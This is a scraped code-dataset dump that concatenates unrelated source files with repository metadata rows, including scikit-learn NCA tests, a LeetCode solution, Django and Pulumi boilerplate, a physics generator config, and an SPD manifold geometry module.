nca = NeighborhoodComponentsAnalysis(init=init, n_components=n_components)
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(n_components, init.shape[0]),
nca.fit, X, y)
@pytest.mark.parametrize('n_samples', [3, 5, 7, 11])
@pytest.mark.parametrize('n_features', [3, 5, 7, 11])
@pytest.mark.parametrize('n_classes', [5, 7, 11])
@pytest.mark.parametrize('n_components', [3, 5, 7, 11])
def test_auto_init(n_samples, n_features, n_classes, n_components):
# Test that auto choose the init as expected with every configuration
# of order of n_samples, n_features, n_classes and n_components.
rng = np.random.RandomState(42)
nca_base = NeighborhoodComponentsAnalysis(init='auto',
n_components=n_components,
max_iter=1,
random_state=rng)
if n_classes >= n_samples:
pass
# n_classes > n_samples is impossible, and n_classes == n_samples
# throws an error from lda but is an absurd case
else:
X = rng.randn(n_samples, n_features)
y = np.tile(range(n_classes), n_samples // n_classes + 1)[:n_samples]
if n_components > n_features:
# this would return a ValueError, which is already tested in
# test_params_validation
pass
else:
nca = clone(nca_base)
nca.fit(X, y)
if n_components <= min(n_classes - 1, n_features):
nca_other = clone(nca_base).set_params(init='lda')
elif n_components < min(n_features, n_samples):
nca_other = clone(nca_base).set_params(init='pca')
else:
nca_other = clone(nca_base).set_params(init='identity')
nca_other.fit(X, y)
assert_array_almost_equal(nca.components_, nca_other.components_)
def test_warm_start_validation():
X, y = make_classification(n_samples=30, n_features=5, n_classes=4,
n_redundant=0, n_informative=5, random_state=0)
nca = NeighborhoodComponentsAnalysis(warm_start=True, max_iter=5)
nca.fit(X, y)
X_less_features, y = make_classification(n_samples=30, n_features=4,
n_classes=4, n_redundant=0,
n_informative=4, random_state=0)
assert_raise_message(ValueError,
'The new inputs dimensionality ({}) does not '
'match the input dimensionality of the '
'previously learned transformation ({}).'
.format(X_less_features.shape[1],
nca.components_.shape[1]),
nca.fit, X_less_features, y)
def test_warm_start_effectiveness():
# A 1-iteration second fit on same data should give almost same result
# with warm starting, and quite different result without warm starting.
nca_warm = NeighborhoodComponentsAnalysis(warm_start=True, random_state=0)
nca_warm.fit(iris_data, iris_target)
transformation_warm = nca_warm.components_
nca_warm.max_iter = 1
nca_warm.fit(iris_data, iris_target)
transformation_warm_plus_one = nca_warm.components_
nca_cold = NeighborhoodComponentsAnalysis(warm_start=False, random_state=0)
nca_cold.fit(iris_data, iris_target)
transformation_cold = nca_cold.components_
nca_cold.max_iter = 1
nca_cold.fit(iris_data, iris_target)
transformation_cold_plus_one = nca_cold.components_
diff_warm = np.sum(np.abs(transformation_warm_plus_one -
transformation_warm))
diff_cold = np.sum(np.abs(transformation_cold_plus_one -
transformation_cold))
assert diff_warm < 3.0, ("Transformer changed significantly after one "
"iteration even though it was warm-started.")
assert diff_cold > diff_warm, ("Cold-started transformer changed less "
"significantly than warm-started "
"transformer after one iteration.")
@pytest.mark.parametrize('init_name', ['pca', 'lda', 'identity', 'random',
'precomputed'])
def test_verbose(init_name, capsys):
# assert there is proper output when verbose = 1, for every initialization
# except auto because auto will call one of the others
rng = np.random.RandomState(42)
X, y = make_blobs(n_samples=30, centers=6, n_features=5, random_state=0)
regexp_init = r'... done in \ *\d+\.\d{2}s'
msgs = {'pca': "Finding principal components" + regexp_init,
'lda': "Finding most discriminative components" + regexp_init}
if init_name == 'precomputed':
init = rng.randn(X.shape[1], X.shape[1])
else:
init = init_name
nca = NeighborhoodComponentsAnalysis(verbose=1, init=init)
nca.fit(X, y)
out, _ = capsys.readouterr()
# check output
lines = re.split('\n+', out)
# if pca or lda init, an additional line is printed, so we test
# it and remove it to test the rest equally among initializations
if init_name in ['pca', 'lda']:
assert re.match(msgs[init_name], lines[0])
lines = lines[1:]
assert lines[0] == '[NeighborhoodComponentsAnalysis]'
header = '{:>10} {:>20} {:>10}'.format('Iteration', 'Objective Value',
'Time(s)')
assert lines[1] == '[NeighborhoodComponentsAnalysis] {}'.format(header)
assert lines[2] == ('[NeighborhoodComponentsAnalysis] {}'
.format('-' * len(header)))
for line in lines[3:-2]:
# The following regex will match for instance:
# '[NeighborhoodComponentsAnalysis] 0 6.988936e+01 0.01'
assert re.match(r'\[NeighborhoodComponentsAnalysis\] *\d+ *\d\.\d{6}e'
r'[+|-]\d+\ *\d+\.\d{2}', line)
assert re.match(r'\[NeighborhoodComponentsAnalysis\] Training took\ *'
r'\d+\.\d{2}s\.', lines[-2])
assert lines[-1] == ''
def test_no_verbose(capsys):
# assert by default there is no output (verbose=0)
nca = NeighborhoodComponentsAnalysis()
nca.fit(iris_data, iris_target)
out, _ = capsys.readouterr()
# check output
assert(out == '')
def test_singleton_class():
X = iris_data
y = iris_target
# one singleton class
singleton_class = 1
ind_singleton, = np.where(y == singleton_class)
y[ind_singleton] = 2
y[ind_singleton[0]] = singleton_class
nca = NeighborhoodComponentsAnalysis(max_iter=30)
nca.fit(X, y)
# One non-singleton class
ind_1, = np.where(y == 1)
ind_2, = np.where(y == 2)
y[ind_1] = 0
y[ind_1[0]] = 1
y[ind_2] = 0
y[ind_2[0]] = 2
nca = NeighborhoodComponentsAnalysis(max_iter=30)
nca.fit(X, y)
# Only singleton classes
ind_0, = np.where(y == 0)
ind_1, = np.where(y == 1)
ind_2, = np.where(y == 2)
X = X[[ind_0[0], ind_1[0], ind_2[0]]]
y = y[[ind_0[0], ind_1[0], ind_2[0]]]
nca = NeighborhoodComponentsAnalysis(init='identity', max_iter=30)
nca.fit(X, y)
assert_array_equal(X, nca.transform(X))
def test_one_class():
X = iris_data[iris_target == 0]
y = iris_target[iris_target == 0]
nca = NeighborhoodComponentsAnalysis(max_iter=30,
n_components=X.shape[1],
init='identity')
nca.fit(X, y)
assert_array_equal(X, nca.transform(X))
def test_callback(capsys):
X = iris_data
y = iris_target
nca = NeighborhoodComponentsAnalysis(callback='my_cb')
assert_raises(ValueError, nca.fit, X, y)
max_iter = 10
def my_cb(transformation, n_iter):
assert transformation.shape == (iris_data.shape[1]**2,)
rem_iter = max_iter - n_iter
print('{} iterations remaining...'.format(rem_iter))
# assert that my_cb is called
nca = NeighborhoodComponentsAnalysis(max_iter=max_iter,
callback=my_cb, verbose=1)
nca.fit(iris_data, iris_target)
out, _ = capsys.readouterr()
# check output
assert('{} iterations remaining...'.format(max_iter - 1) in out)
def test_expected_transformation_shape():
"""Test that the transformation has the expected shape."""
X = iris_data
y = iris_target
class TransformationStorer:
def __init__(self, X, y):
# Initialize a fake NCA and variables needed to call the loss
# function:
self.fake_nca = NeighborhoodComponentsAnalysis()
self.fake_nca.n_iter_ = np.inf
self.X, y, _ = self.fake_nca._validate_params(X, y)
self.same_class_mask = y[:, np.newaxis] == y[np.newaxis, :]
def callback(self, transformation, n_iter):
"""Stores the last value of the transformation taken as input by
the optimizer"""
self.transformation = transformation
transformation_storer = TransformationStorer(X, y)
cb = transformation_storer.callback
nca = NeighborhoodComponentsAnalysis(max_iter=5, callback=cb)
nca.fit(X, y)
assert transformation_storer.transformation.size == X.shape[1]**2
def test_convergence_warning():
nca = NeighborhoodComponentsAnalysis(max_iter=2, verbose=1)
cls_name = nca.__class__.__name__
assert_warns_message(ConvergenceWarning,
'[{}] NCA did not converge'.format(cls_name),
nca.fit, iris_data, iris_target)
@pytest.mark.parametrize('param, value', [('n_components', np.int32(3)),
('max_iter', np.int32(100)),
('tol', np.float32(0.0001))])
def test_parameters_valid_types(param, value):
# check that no error is raised when parameters have numpy integer or
# floating types.
nca = NeighborhoodComponentsAnalysis(**{param: value})
X = iris_data
y = iris_target
nca.fit(X, y)
| [
"[email protected]"
] | |
8f06edb067427872d40d29ef97e33cffafcc5c31 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Leetcode/Leetcode-Minimum Area Rectangle.py | bac5a430a77fc7b720b63b147c68a99ab884d1bd | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | from collections import defaultdict
class Solution:
def minAreaRect(self, points) -> int:
if len(points) <= 3: return 0
x= defaultdict(set)
for xC, yC in points:
x[xC].add(yC)
m = float('inf')
for p1 in points:
for p2 in points:
if p1[0] == p2[0] or p1[1] == p2[1]:
continue
else:
if p2[1] in x[p1[0]] and p1[1] in x[p2[0]]:
t = abs(p1[0] - p2[0]) * abs(p1[1]-p2[1])
m = min(t,m)
return m if m < float('inf') else 0
s = Solution()
print(s.minAreaRect([[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]])) | [
"[email protected]"
] | |
7a5f37ad2f3ff8cf53a9b3b4ca81d5f74320aa45 | 649078315f93e2d76fad95c59f234701ef055cb8 | /test/test_baseSubscriber.py | 820a50160e7e984fa738df7e2c5d59094e7878bd | [
"MIT"
] | permissive | jaebradley/nba_player_news | 207f4555f662c9187e9ab931774a0863556529f8 | 35ac64c369c33f1232fa76bd5bcc1c0704d868bb | refs/heads/master | 2022-11-22T08:25:08.993567 | 2017-06-14T00:36:52 | 2017-06-14T00:36:52 | 89,762,719 | 2 | 0 | MIT | 2022-11-11T17:00:18 | 2017-04-29T04:06:01 | Python | UTF-8 | Python | false | false | 353 | py | from unittest import TestCase
from nba_player_news.data.subscribers import BaseSubscriber
class TestBaseSubscriber(TestCase):
subscriber = BaseSubscriber(subscription_channel_name="foo")
def expect_process_message_to_not_be_implemented(self):
self.assertRaises(NotImplementedError, self.subscriber.process_message(message="bar"))
| [
"[email protected]"
] | |
793073e51592d4314f06fcc0fcbb400e1d8cd9dd | 6872caaa6c3bb59995627064ed1ab63df403bdf6 | /eyantra_provider/venv/Lib/site-packages/authlib/specs/rfc7523/auth.py | 6d737c5ac49b7c82dd49f815df2b3a207dff03bc | [
"MIT"
] | permissive | Andreaf2395/OpenID-Provider | 3189780631d9057140e233930ace72e9bfc76e58 | cdedd42cc49e6f03e3b2570c03fb1f4a2c83be34 | refs/heads/Sameeksha_Final_Provider | 2023-08-21T16:05:42.864159 | 2020-06-18T18:47:16 | 2020-06-18T18:47:16 | 273,314,708 | 0 | 0 | MIT | 2020-06-18T18:48:34 | 2020-06-18T18:44:29 | Python | UTF-8 | Python | false | false | 71 | py | from authlib.oauth2.rfc7523 import register_session_client_auth_method
| [
"[email protected]"
] | |
07985a4f579fa355a9a7fce78a2516fbf7521d8c | 9b367d3f0930a4dfd5f097273a12265fbb706b31 | /textProjectByAli/manage.py | 6fa59a0390d5eea0b49bb3e98b00ee2c3a0a568b | [] | no_license | AliHassanUOS/Remove-Punctuation-Project | a4988f07c685d5e385a279bd67c8c12df4af5c4d | 652cd09668b3ce61904333feb3a624b1b2c1ed42 | refs/heads/master | 2022-12-18T05:29:52.972379 | 2020-09-21T08:00:13 | 2020-09-21T08:00:13 | 297,268,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'textProjectByAli.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
46dfde8b2041244d6ae133d01572576d6944bc71 | 98f7bb1314330138f0cb9901e764f6da8cd5605b | /5_python基础/3_字典.py | 15720e3b4ac0d7bcd22295c0e97684183fa0bb02 | [] | no_license | 1071183139/biji | c964e197ea0845dbfdd98213743130668770f929 | 02c2e6f69ceb557448b959c44723b4bf498e90c9 | refs/heads/master | 2022-12-17T06:46:27.920479 | 2019-10-26T12:02:54 | 2019-10-26T12:02:54 | 217,701,979 | 0 | 0 | null | 2022-12-07T23:55:02 | 2019-10-26T11:57:28 | Python | UTF-8 | Python | false | false | 2,053 | py | # 根据键访问值
info = {'name': '班长', 'id': 100, 'sex': 'f', 'address': '地球亚洲中国北京'}
# print(info['name'])
# print(info['names']) # 键不存在会报错
# get 获取 设置默认值 不存在不会报错
# print(info.get('id'))
# print(info.get('ids','没有这个键'))
# 常见的操作 (修改,增减,删除)
# 修改元素
# new_id=input('请输入元素')
# info['id']=new_id
# print(info1)
# 增加元素 第二个例子
# 如果访问的键存在,就是修改值
# info['id']=18
# print(info)
# 如果访问的键不存在,就是增加元素。
# info['id']=18
# print(info)
# 删除元素(del clear)
# del info[] 或者 del info 删除整个字典
# del info['name']
print(info)
# del info['pp'] # 键不存在会报错
# print(info)
# del info #一种是del加空格,另一种是del()
# print(info) # 删除字典后,字典就不存在。
# clear 清除字典 字典还是存在的,只不过是空字典。
# info.clear()
# print(info) # {}
# 常见的操作2 (len ,keys ,values,items,has_key)
# len 测量字典中,键值对的个数
# print(len(info))
# keys 返回一个包含字典所有KEY的列表
# print(info.keys())
# values 返回一个包含字典中所有值的列表
# print(info.values())
# items 返回一个包含所有(键,值)元祖的列表
# print(info.items()) #[('name', '班长'), ('id', 100), ('sex', 'f'), ('address', '地球亚洲中国北京')]
# in, not in 判断键是否在字典中
# print('name' in info)
# 遍历
for item in info.items():
print(item)
for key,value in info.items():
print(key,value)
# print(type(key,value))
# 带下标的索引
chars = ['a', 'b', 'c', 'd','f']
chars1=('a','c','v','d','h')
# i = 0
# for chr in chars:
# print("%d %s"%(i, chr))
# i += 1
# enumerate # 枚举 列表和元祖都可以。
for i,chr in enumerate(chars1):
print('%d %s'%(i,chr))
a=(1,2,3,4)
b=('a','b','c','d')
c=a+b
print(a+b)
| [
"[email protected]"
] | |
fa14b434145cd963ca27a6eef951a8dff89d13d1 | 62bbfb6c50bba16304202aea96d1de4990f95e04 | /dependencies/pulumi_aws/secretsmanager/secret_policy.py | 81618991d5edb3f606dbf67e2ea3567c4dac6497 | [] | no_license | adriell/lambda-autoservico-storagegateway | b40b8717c8de076e61bbd422461c7d624a0d2273 | f6e3dea61b004b73943a5438c658d3f019f106f7 | refs/heads/main | 2023-03-16T14:41:16.821675 | 2021-03-11T03:30:33 | 2021-03-11T03:30:33 | 345,865,704 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,885 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
__all__ = ['SecretPolicy']
class SecretPolicy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides a resource to manage AWS Secrets Manager secret policy.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example_secret = aws.secretsmanager.Secret("exampleSecret")
example_secret_policy = aws.secretsmanager.SecretPolicy("exampleSecretPolicy",
secret_arn=example_secret.arn,
policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "EnableAllPermissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
\"\"\")
```
## Import
`aws_secretsmanager_secret_policy` can be imported by using the secret Amazon Resource Name (ARN), e.g.
```sh
$ pulumi import aws:secretsmanager/secretPolicy:SecretPolicy example arn:aws:secretsmanager:us-east-1:123456789012:secret:example-123456
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['block_public_policy'] = block_public_policy
if policy is None and not opts.urn:
raise TypeError("Missing required property 'policy'")
__props__['policy'] = policy
if secret_arn is None and not opts.urn:
raise TypeError("Missing required property 'secret_arn'")
__props__['secret_arn'] = secret_arn
super(SecretPolicy, __self__).__init__(
'aws:secretsmanager/secretPolicy:SecretPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None) -> 'SecretPolicy':
"""
Get an existing SecretPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["block_public_policy"] = block_public_policy
__props__["policy"] = policy
__props__["secret_arn"] = secret_arn
return SecretPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="blockPublicPolicy")
def block_public_policy(self) -> pulumi.Output[Optional[bool]]:
"""
Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
"""
return pulumi.get(self, "block_public_policy")
@property
@pulumi.getter
def policy(self) -> pulumi.Output[str]:
return pulumi.get(self, "policy")
@property
@pulumi.getter(name="secretArn")
def secret_arn(self) -> pulumi.Output[str]:
"""
Secret ARN.
"""
return pulumi.get(self, "secret_arn")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
553f3d89c11483b36ae1a20c082db45382ae9e15 | 3b786d3854e830a4b46ee55851ca186becbfa650 | /SystemTesting/pylib/nsx/vsm/edge/edge_sslvpnconfig_schema/edge_sslvpnconfig_layout_configuration_schema.py | 68a4bace81fb3982ea88b3dfde93326a01c98ec6 | [] | no_license | Cloudxtreme/MyProject | d81f8d38684333c22084b88141b712c78b140777 | 5b55817c050b637e2747084290f6206d2e622938 | refs/heads/master | 2021-05-31T10:26:42.951835 | 2015-12-10T09:57:04 | 2015-12-10T09:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 885 | py | import base_schema
class SSLVPNConfigLayoutConfigurationSchema(base_schema.BaseSchema):
_schema_name = "layoutConfiguration"
def __init__(self, py_dict=None):
""" Constructor to create
SSLVPNConfigLayoutConfigurationSchema object
@param py_dict : python dictionary to construct this object
"""
super(SSLVPNConfigLayoutConfigurationSchema, self).__init__()
self.set_data_type('xml')
self.portalTitle = None
self.companyName = None
self.logoExtention = None
self.logoUri = None
self.logoBackgroundColor = None
self.titleColor = None
self.topFrameColor = None
self.menuBarColor = None
self.rowAlternativeColor = None
self.bodyColor = None
self.rowColor = None
if py_dict is not None:
self.get_object_from_py_dict(py_dict) | [
"[email protected]"
] | |
c47ab8e7d986152e8f436c75f1e649796e2231bb | 054bc8696bdd429e2b3ba706feb72c0fb604047f | /python/utils/CheckInRange/CheckInRange.py | b984a85c12b190cb26df2a3aebfbf2bf794a9fde | [] | no_license | wavefancy/WallaceBroad | 076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f | fbd00e6f60e54140ed5b4e470a8bdd5edeffae21 | refs/heads/master | 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,555 | py | #!/usr/bin/env python3
"""
Keep/Remove records in range.
@Author: [email protected]
Usage:
CheckInRange.py -r file -c int [-e]
CheckInRange.py -h | --help | -v | --version | -f | --format
Notes:
1. Read content from stdin, and output result to stdout.
2. Column index start from 1.
Options:
-c int Column index for value.
-r file Range file, two columns, range_start range_end.
-e Exclude(Remove) records in defined range, default Include(Keep).
-f --format Show example.
-h --help Show this screen.
-v --version Show version.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE,SIG_DFL)
# pip install pyinterval
# https://pyinterval.readthedocs.io/en/latest/install.html
try:
from interval import interval
except:
sys.stderr.write('ERROR for import package "interval"!\nPlease install by "pip install pyinterval"!\n')
sys.exit(-1)
def ShowFormat():
print('''
# input
#-----------------
100 10
1000000 20
5000000 20
7000000 3
10000000 30
#range file:
#-----------------
1000000 5000000
# cat in.txt | python3 CheckInRange.py -r range.txt -c 1
#-----------------
1000000 20
5000000 20
cat in.txt | python3 CheckInRange.py -r range.txt -c 1 -e
#-----------------
100 10
7000000 3
10000000 30
''')
if __name__ == '__main__':
args = docopt(__doc__, version='3.0')
#print(args)
if(args['--format']):
ShowFormat()
sys.exit(-1)
#
colValue = int(args['-c']) -1
keep = True
if args['-e']:
keep = False
irange = interval()
with open(args['-r'],'r') as inf:
for line in inf:
line = line.strip()
if line:
ss = line.split()
irange = irange | interval[float(ss[0]), float(ss[1])]
#-------------------------------------------------
for line in sys.stdin:
line = line.strip()
if line:
ss = line.split()
try:
v = int(ss[colValue])
if keep:
if v in irange:
sys.stdout.write('%s\n'%(line))
else:
if not (v in irange):
sys.stdout.write('%s\n'%(line))
except ValueError:
sys.stderr.write('WARN: parse value error(skiped): %s\n'%(line))
sys.stdout.flush()
sys.stdout.close()
sys.stderr.flush()
sys.stderr.close()
| [
"[email protected]"
] | |
607be8af08490cdeb3c8bebdd88c48c0eb7029a9 | d1ad7bfeb3f9e3724f91458277284f7d0fbe4b2d | /react/003-react-django-justdjango/backend/env/lib/python3.6/operator.py | fd9d9c6e64c46a252a453b8f263544655f85d35c | [] | no_license | qu4ku/tutorials | 01d2d5a3e8740477d896476d02497d729a833a2b | ced479c5f81c8aff0c4c89d2a572227824445a38 | refs/heads/master | 2023-03-10T20:21:50.590017 | 2023-03-04T21:57:08 | 2023-03-04T21:57:08 | 94,262,493 | 0 | 0 | null | 2023-01-04T21:37:16 | 2017-06-13T22:07:54 | PHP | UTF-8 | Python | false | false | 58 | py | /Users/kamilwroniewicz/anaconda3/lib/python3.6/operator.py | [
"[email protected]"
] | |
82a535bcf1ac49a0530f8b1435d3329a2280a09b | 118124f2e903dab8a425c6d99e7ac8fa6f559aa4 | /devel/py-repoze.xmliter/files/patch-setup.py | ccbbb76a7d9156aabc0ee41314c870b7f15170f0 | [] | no_license | mneumann/DPorts | 30b3abfdf58b63698bc66c8614073e3366b5fd71 | d511cdf563ed8133ea75670bfa6e3e895495fefd | refs/heads/master | 2020-12-26T00:46:41.527700 | 2015-01-27T14:54:22 | 2015-01-27T14:54:22 | 28,131,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | --- setup.py.orig 2014-09-21 15:40:44 UTC
+++ setup.py
@@ -43,7 +43,7 @@ setup(name='repoze.xmliter',
author_email="[email protected]",
url="http://www.repoze.org",
license="BSD-derived (http://www.repoze.org/LICENSE.txt)",
- packages=find_packages(),
+ packages = ['repoze', 'repoze.xmliter'],
include_package_data=True,
namespace_packages=['repoze'],
zip_safe=False,
| [
"[email protected]"
] | |
024d663ec6247259c4849e881e211d74a27a846a | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Generators/PowhegControl/examples/processes/MC15.101010.PowhegPythia8EvtGen_A14NNPDF23_VBF_W_example.py | 0eed1637cfa4f4c7d9a0b3470d317a5272088e7b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,095 | py | # Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
#--------------------------------------------------------------
# EVGEN configuration
#--------------------------------------------------------------
evgenConfig.description = "POWHEG+Pythia8 VBF W production with A14 NNPDF2.3 tune."
evgenConfig.keywords = ["SM", "VBF", "W"]
evgenConfig.contact = ["[email protected]"]
# --------------------------------------------------------------
# Load ATLAS defaults for the Powheg VBF_W process
# --------------------------------------------------------------
include("PowhegControl/PowhegControl_VBF_W_Common.py")
# --------------------------------------------------------------
# Generate events
# --------------------------------------------------------------
PowhegConfig.generate()
#--------------------------------------------------------------
# Pythia8 showering with the A14 NNPDF2.3 tune
#--------------------------------------------------------------
include("MC15JobOptions/Pythia8_A14_NNPDF23LO_EvtGen_Common.py")
include("MC15JobOptions/Pythia8_Powheg.py")
| [
"[email protected]"
] | |
7d77907d67969dbeb7a841f56e36294174ac81b0 | 2e2cb71a102c144427f3a3d4c3f2717472e1a2ac | /SPD.py | 6257cf5234470ceb1b82217a8de233f0b56533d4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | pdhung3012/RegGNN | 740af76d90740c38f6be502ed6f9495b6d59a4a8 | a383562121d205f7bb86751242882b7e815eee3f | refs/heads/main | 2023-07-08T13:43:41.903844 | 2021-08-16T07:55:31 | 2021-08-16T07:55:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,128 | py | '''
Tools for computing topological features in Riemannian space.
Code taken from https://morphomatics.github.io/,
created by Felix Ambellan and Martin Hanik and Christoph von Tycowicz, 2021.
'''
import numpy as np
import numpy.random as rnd
import numpy.linalg as la
from scipy.linalg import logm, expm_frechet
from pymanopt.manifolds.manifold import Manifold
from pymanopt.tools.multi import multisym
class SPD(Manifold):
"""Returns the product manifold Sym+(d)^k, i.e., a product of k dxd symmetric positive matrices (SPD).
manifold = SPD(k, d)
Elements of Sym+(d)^k are represented as arrays of size kxdxd where every dxd slice is an SPD matrix, i.e., a
symmetric matrix S with positive eigenvalues.
The Riemannian metric used is the product Log-Euclidean metric that is induced by the standard Euclidean trace
metric; see
Arsigny, V., Fillard, P., Pennec, X., and Ayache., N.
Fast and simple computations on tensors with Log-Euclidean metrics.
"""
def __init__(self, k=1, d=3):
if d <= 0:
raise RuntimeError("d must be an integer no less than 1.")
if k == 1:
self._name = 'Manifold of symmetric positive definite {d} x {d} matrices'.format(d=d, k=k)
elif k > 1:
self._name = 'Manifold of {k} symmetric positive definite {d} x {d} matrices (Sym^+({d}))^{k}'.format(d=d, k=k)
else:
raise RuntimeError("k must be an integer no less than 1.")
self._k = k
self._d = d
def __str__(self):
return self._name
@property
def dim(self):
return int((self._d*(self._d+1)/2) * self._k)
@property
def typicaldist(self):
# typical affine invariant distance
return np.sqrt(self._k * 6)
def inner(self, S, X, Y):
"""product metric"""
return np.sum(np.einsum('...ij,...ij', X, Y))
def norm(self, S, X):
"""norm from product metric"""
return np.sqrt(self.inner(S, X, X))
def proj(self, X, H):
"""orthogonal (with respect to the Euclidean inner product) projection of ambient
vector ((k,3,3) array) onto the tangent space at X"""
return dlog(X, multisym(H))
def egrad2rgrad(self,X,D):
# should be adj_dexp instead of dexp (however, dexp appears to be self-adjoint for symmetric matrices)
return dexp(log_mat(X), multisym(D))
def ehess2rhess(self, X, Hess):
# TODO
return
def exp(self, S, X):
"""Riemannian exponential with base point S evaluated at X"""
assert S.shape == X.shape
# (avoid additional exp/log)
Y = X + log_mat(S)
vals, vecs = la.eigh(Y)
return np.einsum('...ij,...j,...kj', vecs, np.exp(vals), vecs)
retr = exp
def log(self, S, U):
"""Riemannian logarithm with base point S evaluated at U"""
assert S.shape == U.shape
# (avoid additional log/exp)
return log_mat(U) - log_mat(S)
def geopoint(self, S, T, t):
""" Evaluate the geodesic from S to T at time t in [0, 1]"""
assert S.shape == T.shape and np.isscalar(t)
return self.exp(S, t * self.log(S, T))
def rand(self):
S = np.random.random((self._k, self._d, self._d))
return np.einsum('...ij,...kj', S, S)
def randvec(self, X):
Y = self.rand()
y = self.log(X, Y)
return y / self.norm(X, y)
def zerovec(self, X):
return np.zeros((self._k, self._d, self._d))
def transp(self, S, T, X):
"""Parallel transport for Sym+(d)^k.
:param S: element of Symp+(d)^k
:param T: element of Symp+(d)^k
:param X: tangent vector at S
:return: parallel transport of X to the tangent space at T
"""
assert S.shape == T.shape == X.shape
# if X were not in algebra but at tangent space at S
#return dexp(log_mat(T), dlog(S, X))
return X
def eleminner(self, R, X, Y):
"""element-wise inner product"""
return np.einsum('...ij,...ij', X, Y)
def elemnorm(self, R, X):
"""element-wise norm"""
return np.sqrt(self.eleminner(R, X, X))
def projToGeodesic(self, X, Y, P, max_iter=10):
'''
:arg X, Y: elements of Symp+(d)^k defining geodesic X->Y.
:arg P: element of Symp+(d)^k to be projected to X->Y.
:returns: projection of P to X->Y
'''
assert X.shape == Y.shape
assert Y.shape == P.shape
# all tagent vectors in common space i.e. algebra
v = self.log(X, Y)
v /= self.norm(X, v)
w = self.log(X, P)
d = self.inner(X, v, w)
return self.exp(X, d * v)
def pairmean(self, S, T):
assert S.shape == T.shape
return self.exp(S, 0.5 * self.log(S, T))
